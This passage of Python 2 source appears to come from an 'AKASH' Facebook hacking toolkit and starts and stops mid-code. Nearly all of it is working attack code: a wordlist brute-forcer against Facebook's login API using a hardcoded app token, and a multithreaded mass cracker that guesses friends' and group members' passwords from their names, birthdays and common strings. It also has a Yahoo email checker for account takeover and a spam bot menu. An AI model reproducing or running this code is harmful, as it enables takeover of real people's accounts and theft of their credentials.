print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "Swabi123, Mardan12, Pubglover, Peshawar, Love123, Bahubali, Pak1233, Muhammad, Allah123, Ghulaman"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mAKASH_Hack\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mAKASH_CP\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.0)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Crack with list friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Crack from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Crack from member group"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Crack from File"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend id \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[AKASH] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=9999999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak == "4":
os.system('reset')
print logo
try:
idlist = raw_input('\033[1;91m[AKASH] \033[1;92mFile ID \033[1;91m: \033[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;91m[!] File not found'
raw_input('\n\033[1;91m[ \033[1;97mBack \033[1;91m]')
super()
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[AKASH] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "786786","Pakistan"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "Lahore12","PakArmy"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = "Swabi123, Mardan12, Pubglover, Peshawar, Love123, Bahubali, Pak1233, Muhammad, Allah123, Ghulaman"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
#Pass8
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass8 = "januari","februari","march123","april","may123","june123","juli123","augustus","september","november","december"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%252525257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass8+" =>"+z['name'])
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(0.01)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[AKASH] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
